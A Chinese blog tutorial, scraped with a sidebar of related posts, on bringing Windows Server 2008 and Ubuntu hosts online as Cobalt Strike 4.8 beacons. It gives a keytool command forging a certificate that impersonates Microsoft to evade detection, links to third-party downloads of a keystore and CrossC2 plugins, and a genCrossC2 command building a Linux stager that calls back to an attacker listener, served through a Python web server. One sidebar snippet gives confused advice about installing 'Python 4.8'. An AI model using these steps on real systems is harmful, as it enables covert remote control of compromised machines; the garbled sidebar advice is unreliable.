CS4.8上线Ubantu,Win08Server

已于 2024-09-30 11:10:56 修改
阅读量397 收藏 6
点赞数 3
文章标签: 网络安全 安全
于 2024-09-30 10:53:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_47095885/article/details/142650185
版权

1.CS使用https上线win08Server

1.1首先在win08启用tls1.2

1.2kali端

删除服务端Server目录下的cobaltstrike.store
 

image


利用keytool生成新的一个无特征的证书文件cobaltstrike.store

keytool -keystore cobaltstrike.store -storepass test -keypass test -genkey -keyalg RSA -alias test -dname "CN=Microsoft Windows, OU=MOPR, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US"
# 也就是这个格式,可自由替换中文部分内容:keytool -keystore 生成的store名 -storepass 密码 -keypass 密码 -genkey -keyalg RSA -alias 自定义别名 -dname "CN=Microsoft Windows, OU=MOPR, O=Microsoft Corporation, L=Redmond, ST=Washington, C=US"

keytool是一个Java 数据证书的管理工具,使用如下:

-keytool -keystore cobaltstrike.store -storepass 密码
-keypass 密码
-genkey -keyalg RSA
-alias google.com -dname "CN=(名字与姓氏),
OU=(组织单位名称), O=(组织名称),
L=(城市或区域名称),
ST=(州或省份名称),
C=(单位的两字母国家代码)

常用keytool命令

查看证书文件:keytool -list -v -keystore cobaltstrike.store

修改证书密码:keytool -storepasswd -keystore cobaltstrike.store

修改alias别名:keytool -changealias -keystore cobaltstrike.store -alias sourame -destalias new_name

证书生成完毕后,查看一下是否是新的证书内容

image

建议同时修改teamserver中的keytool,防止证书被删除后自动生成默认证书。

image

之后正常先启动服务端,查看是否有报错。有报错,下载下面的文件,到CS的Server进行替换。该store文件密码是123456

通过百度网盘分享的文件:cobaltstrike.store
链接:https://pan.baidu.com/s/1gKumzCc8EkOtnscKf9YCUA 
提取码:6666

无报错继续启动Client,后添加Listeners

最后拿生成的木马正常去上线即可

2.上线Ubantu

2.1首先下载下面的文件,之后拖到Client目录下

通过百度网盘分享的文件:c2.zip
链接:https://pan.baidu.com/s/1sM9YQJrLqhdnGKb6DVJOPw 
提取码:6666

解压之后修改文件【CrossC2-GithubBot-2023-11-20.cna】内的路径Client的绝对路径

之后加载cna后缀的文件

从下往上依次加载

之后添加监听

之后去到Client,使用命令生成木马:

./genCrossC2.Linux 192.168.126.132 1122 ./.cobaltstrike.beacon_keys null Linux x64 ./new.out stager

注意:IP对应Listener的IP,端口也对应Listener的端口,之后去Ubantu运行即可上线

可以使用python搭建服务,进行文件下载:python -m http.server 6543

最新CobaltStrike4.8/CobaltStrike4.9、CS4.9/CS4.8Windows/Linux/Mac版下载
weixin_43167326的博客
12-28 6353
Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe木马生成,win dll木马生成,java木马生成,
在Ubuntu中安装GCC-4.8
Guoracle
03-28 3672
环境:Ubuntu 11.10桌面版本              内核版本:3.0.0-32-generic 在Ubuntu 11.10桌面版本中默认安装的GCC版本是4.6.1,而最新的版本是4.8。 有关GCC-4.8的新特性请查看:http://gcc.gnu.org/ 安装准备: 下载GCC-4.8: http://gcc.gnu.org/mirrors.h
CobaltStrike4.8
05-30
使用方法 1、将server文件夹上传到java11环境的linux 然后使用以下命令启动(给teamserver和teamserver执行权限) ./teamserver ip 密码 2、使用java11环境的windows 双击client文件夹下的Cobalt-client.cmd 即可启动 默认连接端口50050
cs使用详细教程
m0_52923241的博客
03-23 7250
打开kali,在cs文件夹里打开终端 在终端输入以下两条命令 1–>chmod +x teamserver 2–>./teamserver IP 密码 服务端真实IP(不能使用0.0.0.0或127.0.0.1)和连接密码 然后执行cs里的start.bat,会弹出一个窗口 第一步先添加一个监听器 生成后门 开始钓鱼 ...
CobaltStrike4.8汉化版带插件
热门推荐
SuperherRo的博客
09-16 2万+
CobaltStrike4.8汉化版带插件安装及使用教程
神器CobaltStrike4.8安装指南
Sgirll的博客
07-22 9556
Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。
黑客必备利器:如何在kali系统上安装和使用 CobaltStrik4.8
2301_76332302的博客
08-27 5842
与外部beacon类似,内部beacon是指潜伏在目标系统内部的小型程序或代码片段,定期与命令和控制(C2)服务器进行通信,以提供有关目标系统的信息或接收进一步的指令。内部beacon主要用于网络安全领域中进行威胁侦测和入侵检测。Beacon DNS:Beacon DNS是指通过DNS协议进行通信的beacon。攻击者可以使用DNS流量来与受感染系统进行通信,并通过DNS查询和响应中隐藏恶意指令或数据。Beacon HTTP:Beacon HTTP是指通过HTTP协议进行通信的beacon。
Cobalt Strike4.8使用插件中文乱码解决方法
飞蓬的博客
07-31 2433
插件使用乱码主要跟cs客户端加载没有指定UTF-8编码有关。指定编码的字符:-Dfile.encoding=UTF-8
CobaltStrike4.8渗透工具cs下载(有手就会版)
2301_79316009的博客
06-21 1676
ls -l看teamserver权限,像我这个图就是已经 chmod加权 过了。也可以ctrl+x(x点五下)强制退出rz命令,但是偶尔对文件有损失。小白白,刚上手一般会忘记开端口号50050,而导致客户端会连接超时。3.请求特征:下发的指令,url路径,老版本固定的ua头。这里只需要给予teamserver文件执行权限即可。上传成功后等待一会儿,就会自动取消rz命令的执行。3.2.1给予teamserver文件的权限。如果进行二开魔改后的cs,可提取样本。3.2.2 运行服务端。
ubuntu20.04版本安装gcc-4.8
feinifi的博客
12-08 1万+
ubuntu2004版本默认已经将gcc支持的版本更新到了gcc-9,如果要降级gcc的版本,需要设置新的源,然后安装指定版本,思路就是这样。 可以看到如下这个图片,4.8版本对应的各个ubuntu版本: 从这个图里面可以看到4.8.5版本支持最高的ubuntu是16.06版本。也就是xenial。并不支持focal,也就是ubuntu2004。其实很多文章提到的安装方法也是基于这个事实来做的安装。 我们找的apt源,也是xeneil的源,如下所示: ...
Cobalt Strike 4.8 Full Black Edition
06-23
Cobalt Strike 4.8 Full Black Edition
ubantu18.04
06-07
ubantu18.04下载资源文件,有需要ubantu系统的可以进行下载
网易云 Linux Ubantu16.04
04-23
解决ubantu16.04用户现在网易云官网上只有ubantu18.04的问题,资源为ubantu16.04下安装网易云的软件压缩包,安装有问题请私聊我
Win10/deepin下安装ubantu14.04/16.04双系统或三系统
TongXXhaha的博客
08-11 5243
Win10/deepin下安装ubantu14.04/16.04双系统或三系统 本方法博主亲测多次有效,使用过不下二十次,一般来说只要不是神机,均可成功~~ 1.下载镜像文件,选择合适的版本进行下载(https://linux.cn/article-4130-1.html)。 2.制作U盘启动盘,可选择ultralso进行刻录,具体参考(http://jingyan.baidu.com/
实习day9
m0_63785972的博客
09-12 610
命令:net user说明:此命令列出当前Windows系统上的所有用户账户。cs4.8kali环境安装首先将下载好的cs4.8文件拷贝进虚拟机目录中进入其中的Server目录,开启客户端服务,这里设置了1111为密码,表示可以用任意用户名加上1111的密码登入192.168.111.129的服务(注:此命令必须用sudo执行,普通用户权限不够)主机登录cs,进入目录里的.vbs文件,输入对应的ip和密码,进入cs添加监听器生成木马将木马保存至桌面加载木马,查看监听结果。
CS安装与smf互联
XiaoYeZhu_1314的博客
09-09 1149
第三步:就打开cs4.8的client端选择vbs启动,输入我们上面配置好了的IP和密码,端口默认50050【端口可以自己改】第二步:把cs的安装包复制进kali中【这里我是把cs的安装包放到桌面上的】,打开severs端,进行配置。有效载荷-》wind可执行程序【版本是64位的就勾选】,生成后门【这里用我自己的本机做实验】上线成功。第一次使用会出现这个【要确定这个指纹是否与团队服务器启动时显示的指纹相匹配】直接点击“是”就行了。第一步:在MSF中设置监听【IP地址为kali的IP】的payload。
网安实习Day9@^@
qq_64696386的博客
09-09 1456
(1)目标系统信息:首先,需要收集目标系统的基本信息,包括操作系统版本、补丁安装情况、网络配置、运行的服务等。netstat -ano:显示网络连接、路由表、接口统计等信息,其中-a显示所有连接和侦听端口,-n以数字形式显示地址和端口号,-o显示每个连接的拥有者进程ID。(1)漏洞扫描:利用漏洞扫描工具(如Nessus、OpenVAS等)对目标系统进行全面的漏洞扫描,以发现可利用的漏洞。(2)漏洞评估:对扫描到的漏洞进行评估,确定哪些漏洞是可利用的,以及它们能够提升到的权限级别。
Cobalt Strike
weixin_58954236的博客
10-18 900
msf生成木马后,受害者运行木马找的是使用msf生成木马的主机。攻击者和失陷主机是实时通信的。CS (Cobalt Strike)分为服务器(CS server)和客户端(CS client),开启CS server后会自动启动50050端口(CS官方默认打开,使用前尽量更改端口)开放端口后客户端(CS client)会连接50050端口。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8708
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
kali安装CS4.8下载安装
最新发布
12-26
Kali Linux是一款专门为安全评估、渗透测试和网络安全教育设计的操作系统,它包含了广泛的工具和软件包。如果你想在Kali上安装Python版本4.8CS4.8可能是某个特定版本的误解,通常指Python 4.8),你可以按照以下步骤操作: 1. **更新系统**: 打开终端并运行: ``` sudo apt-get update sudo apt-get upgrade ``` 2. **安装依赖**: 由于默认的Python版本不是最新,我们需要先安装一些依赖库,如`build-essential`: ``` sudo apt-get install python3-dev ``` 3. **访问Python仓库**: 添加Python PPA (Personal Package Archive): ``` curl https://bootstrap.pypa.io/get-pip.py -o get-pip.py sudo python3 get-pip.py pip3 install --upgrade pip ``` 4. **安装指定版本的Python**: 使用`pip3`安装Python 4.8(如果有的话,因为目前Python 4.8还未正式发布,可能会遇到版本问题): ``` sudo pip3 install python==4.8.* ``` 5. **验证安装**: 安装完成后,可以检查Python版本: ``` python3 --version ``` 请注意,如果官方尚未提供Python 4.8的稳定版,上述步骤可能无法直接获取该版本,可能需要从Python官网或其他可信源下载安装包手动安装。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值